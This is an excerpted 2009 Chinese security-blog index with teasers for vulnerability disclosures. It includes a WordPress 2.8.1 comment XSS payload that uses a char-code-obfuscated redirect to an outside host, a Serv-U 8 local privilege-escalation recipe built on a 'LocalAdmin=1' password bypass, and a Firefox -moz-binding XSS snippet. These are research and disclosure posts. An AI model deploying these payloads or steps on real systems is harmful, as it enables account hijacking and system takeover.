昨天看到篇文章,极其猥琐。
《恶意代码JS.SecurityToolFraud诱使用户下载安装流氓安全软件》
http://www.symantec.com/connect/node/1147541
重要是猥琐,其中有个图,显示用户的每个磁盘有多少病毒:
这个图需要得到用户盘符有多少,和KJ讨论了半天。
他说06年时,有老外发了个img加载文件时间,判断文件是否存在的猥琐方式。
不过我没找到这个代码,所以研究下,也搞了一种方式:
[……]
Struts2框架安全缺陷《Webzine4文章》
作者: 空虚浪子心 日期: 2009 年 12 月 22 日 没有评论 | 21,887 views
看到大家都在刷幻影的planet,webzine地址:
http://secinn.appspot.com/pstzine/read?issue=4
我也投了一篇凑个热闹,《Struts2框架安全缺陷》: http://secinn.appspot.com/pstzine/read?issue=4&articleid=3
本篇blog再贴一下,欢迎大家评论。
摘要
本文介绍了java开发流行框架struts2以及webwork的一些安全缺陷,并举例说明框架本身以及开发人员使用 框架时,所产生的种种安全问题,以及作者挖掘框架安全漏洞的一些心得体会。
推荐以下人群阅读
了解java开发 了解框架开发 了解web application安全 “网络安全爱好者”
[……]
serv-u8的本地溢出,0改动支持serv-u9版本!
作者: 空虚浪子心 日期: 2009 年 12 月 07 日 没有评论 | 6,504 views
RT,就差官方认证EXP了。
http://inbreak.net/?action=show&id=157
今天本来打算研究serv-u9的本地溢出,没想到测试一下8的溢出,居然同时支持9使用。
没有任何一行代码变动。
这说明官方为了向下兼容我写的exp,特地没有改动。
[……]
浅谈公众短信接口安全
作者: 空虚浪子心 日期: 2009 年 08 月 13 日 没有评论 | 8,517 views
网站给用户发送手机短信,已经是一种流行元素,几乎各大门户网站都有给用户发短信的功能。网站发送短信一般有主动和被动两种方式。主动方式,是让用户填写自己的手机号,之后发送。被动的方式,是用户发短信给某个网站提供的号码,之后网站回复。
朋友以前做过短信服务,短信接口毕竟不是免费的,虽然成本很低,但是大量的短信,也会让有些人心疼一阵。为了节约成本,为了防止用户发恶意内容的短信(欺诈、不“绿坝”等),网站都会采取加入验证码、不允许用户控制短信内容等防御。但是总会有人疏漏很多。
抓个典型:
某大型门户网站有个功能,发送“手机游戏”的下载地址给用户的手机。
[……]
serv-u8 本地提权
作者: 空虚浪子心 日期: 2009 年 08 月 05 日 没有评论 | 6,526 views
by kxlzx inbreak.net
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。
Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制台打开web页面时,是不需要验证密码的。
2, 管理员如果用某URL打开web页面时,虽然需要输入密码,但是无论输入什么,都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3, 管理员可以添加用户有两种,一种是全局用户,一种是某个域下的用户。而权限设置也是两种,一种是全局,一种是针对用户。
4, 管理员添加了用户的这个包和设置权限这个包,是分开的。
所以,我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆,exec命令。达到提权。
前面su7已经说了很多,这里简单的说下好了。
…..登陆什么的。
1,获取ID。
2,给这个id添加权限。
3,给这个id赋予用户名,密码,目录,权限。
4,登陆后执行系统命令。
[……]
sablog1.6的CSRF漏洞POC
作者: 空虚浪子心 日期: 2009 年 07 月 20 日 没有评论 | 8,297 views
sablog1.6的CSRF漏洞POC。
这个在我的blog中测试成功,官方下载的最新版本测试成功,但是在小泽的blog失败的。
原因是他自己修改了源程序,判断了referer。
[……]
wordpress281评论显示xss漏洞
作者: 空虚浪子心 日期: 2009 年 07 月 16 日 没有评论 | 11,458 views
wordpress281评论显示xss漏洞
by kxlzx inbreak.net
ps:感谢鬼仔’blog,XEYE’s blog协助测试。
实际上是个XSS漏洞。
POC:
在评论的网址一栏,填写
http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);
[……]
FF3的《moz-binding: url》未限制文件扩展名导致XSS漏洞
作者: 空虚浪子心 日期: 2009 年 06 月 26 日 没有评论 | 5,373 views
kxlzx:因为在http://hi.baidu.com/hi_heige/的留言被百度删除了,只好在这里发篇。
在http://www.80vul.com/qqmail/QQmail%20Multiple%20Xss%20Vulnerabilities.htm
看到,FF3对
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
url中的域,是有限制的。
如果配合一些web应用的功能,可以绕过这个限制。
[……]
AJAX结合URL转发漏洞跨域提交数据
作者: 空虚浪子心 日期: 2009 年 05 月 08 日 没有评论 | 5,767 views
Chrome浏览器,在使用ajax的时候,通过url转发漏洞的配合,可以跨域提交数据(但是不能读取返回数据)。
IE6的某些版本(不知道是什么版本,在家里和某个网吧成功了),通过用户点“确定”后,也是可以跨域提交并接收数据的。
对于chrome这里,没办法读取目标域返回的数据,深感遗憾,所以发出来这篇文章,大家想想办法。
[……]
利用GOOGLE的分析器做server limit dos
作者: 空虚浪子心 日期: 2009 年 04 月 22 日 没有评论 | 4,413 views
本文纯属YY,最后未实践成功,但是不排除其他网站有类似可能。
很多网站都使用了google的统计。
当我们从一个网站(A)链接到带有google统计的网站(B)时,google会记录referer的URI,并存入B的COOKIE中。
如果我们可以影响referer,是不是就可以攻击任何带有google统计的网站呢?
[……]